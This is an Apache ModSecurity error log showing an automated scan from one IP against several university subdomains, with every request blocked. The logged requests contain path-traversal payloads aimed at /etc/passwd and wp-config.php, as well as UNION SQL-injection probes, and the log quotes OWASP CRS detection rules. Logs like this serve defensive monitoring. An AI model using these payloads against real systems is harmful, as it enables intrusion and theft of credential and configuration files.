[Tue Aug 29 11:47:10.489908 2023] [:error] [pid 2265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14TsCo-f0AAAjZRZIAAAAS"]
[Tue Aug 29 11:47:10.491262 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14TsCo-f0AAAjIhn4AAAAJ"]
[Tue Aug 29 11:47:10.505882 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14TsCo-f0AAAjkM04AAAAI"]
[Tue Aug 29 11:47:11.264711 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14T8Co-f0AAAh131cAAAAz"]
[Tue Aug 29 11:47:11.400230 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAh131sAAAAz"]
[Tue Aug 29 11:47:11.505326 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:value: ../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/change_setting"] [unique_id "ZO14T8Co-f0AAAjkM1wAAAAI"]
[Tue Aug 29 11:47:11.863215 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAjCbD0AAAAB"]
[Tue Aug 29 11:47:11.866458 2023] [:error] [pid 2267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAjbwzoAAAAW"]
[Tue Aug 29 11:47:11.885548 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAjtc0EAAAAX"]
[Tue Aug 29 11:47:11.887069 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14T8Co-f0AAAjCbD4AAAAB"]
[Tue Aug 29 11:47:12.359324 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../ found within ARGS:fn: ../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/cs/career/getSurvey.jsp"] [unique_id "ZO14UMCo-f0AAAj111sAAAAa"]
[Tue Aug 29 11:47:13.377643 2023] [:error] [pid 2293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAj1118AAAAa"]
[Tue Aug 29 11:47:13.412454 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAjav0sAAAAV"]
[Tue Aug 29 11:47:13.420055 2023] [:error] [pid 2238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAi@TCoAAAAM"]
[Tue Aug 29 11:47:13.422962 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAjCbEgAAAAB"]
[Tue Aug 29 11:47:13.431391 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UcCo-f0AAAhzvqgAAAAx"]
[Tue Aug 29 11:47:13.466291 2023] [:error] [pid 2276] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UcCo-f0AAAjkM2EAAAAI"]
[Tue Aug 29 11:47:14.366600 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UsCo-f0AAAhzvqsAAAAx"]
[Tue Aug 29 11:47:14.367069 2023] [:error] [pid 2266] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UsCo-f0AAAjav08AAAAV"]
[Tue Aug 29 11:47:14.373657 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UsCo-f0AAAcsLeUAAAAE"]
[Tue Aug 29 11:47:14.379311 2023] [:error] [pid 2248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14UsCo-f0AAAjIhoQAAAAJ"]
[Tue Aug 29 11:47:14.395736 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:libpath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:libpath: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "ZO14UsCo-f0AAAjrbHAAAAAP"]
[Tue Aug 29 11:47:15.420703 2023] [:error] [pid 2282] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAjqDEoAAAAH"]
[Tue Aug 29 11:47:15.423534 2023] [:error] [pid 2285] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14U8Co-f0AAAjtc08AAAAX"]
[Tue Aug 29 11:47:15.436472 2023] [:error] [pid 2252] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAjM7DsAAAAT"]
[Tue Aug 29 11:47:15.480917 2023] [:error] [pid 2283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAjrbHEAAAAP"]
[Tue Aug 29 11:47:15.501059 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14U8Co-f0AAAdxU0EAAAAC"]
[Tue Aug 29 11:47:15.872908 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAjdQM8AAAAZ"]
[Tue Aug 29 11:47:15.935506 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14U8Co-f0AAAjy51YAAAAG"]
[Tue Aug 29 11:47:16.355006 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:id: 6' UNION ALL SELECT md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/admin/requests/take_action.php"] [unique_id "ZO14VMCo-f0AAAhl0HkAAAAi"]
[Tue Aug 29 11:47:16.359532 2023] [:error] [pid 2242] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:username: {{username}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/ajax.php"] [unique_id "ZO14VMCo-f0AAAjCbE8AAAAB"]
[Tue Aug 29 11:47:16.398227 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VMCo-f0AAAcsLekAAAAE"]
[Tue Aug 29 11:47:16.407748 2023] [:error] [pid 2264] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VMCo-f0AAAjYrB4AAAAK"]
[Tue Aug 29 11:47:16.409621 2023] [:error] [pid 2250] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VMCo-f0AAAjKywsAAAAQ"]
[Tue Aug 29 11:47:16.413174 2023] [:error] [pid 2290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VMCo-f0AAAjy51kAAAAG"]
[Tue Aug 29 11:47:16.427346 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,2,3,4,5,6,md5(999999999),8,9,10,11-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/manage_booking.php"] [unique_id "ZO14VMCo-f0AAAhl0HwAAAAi"]
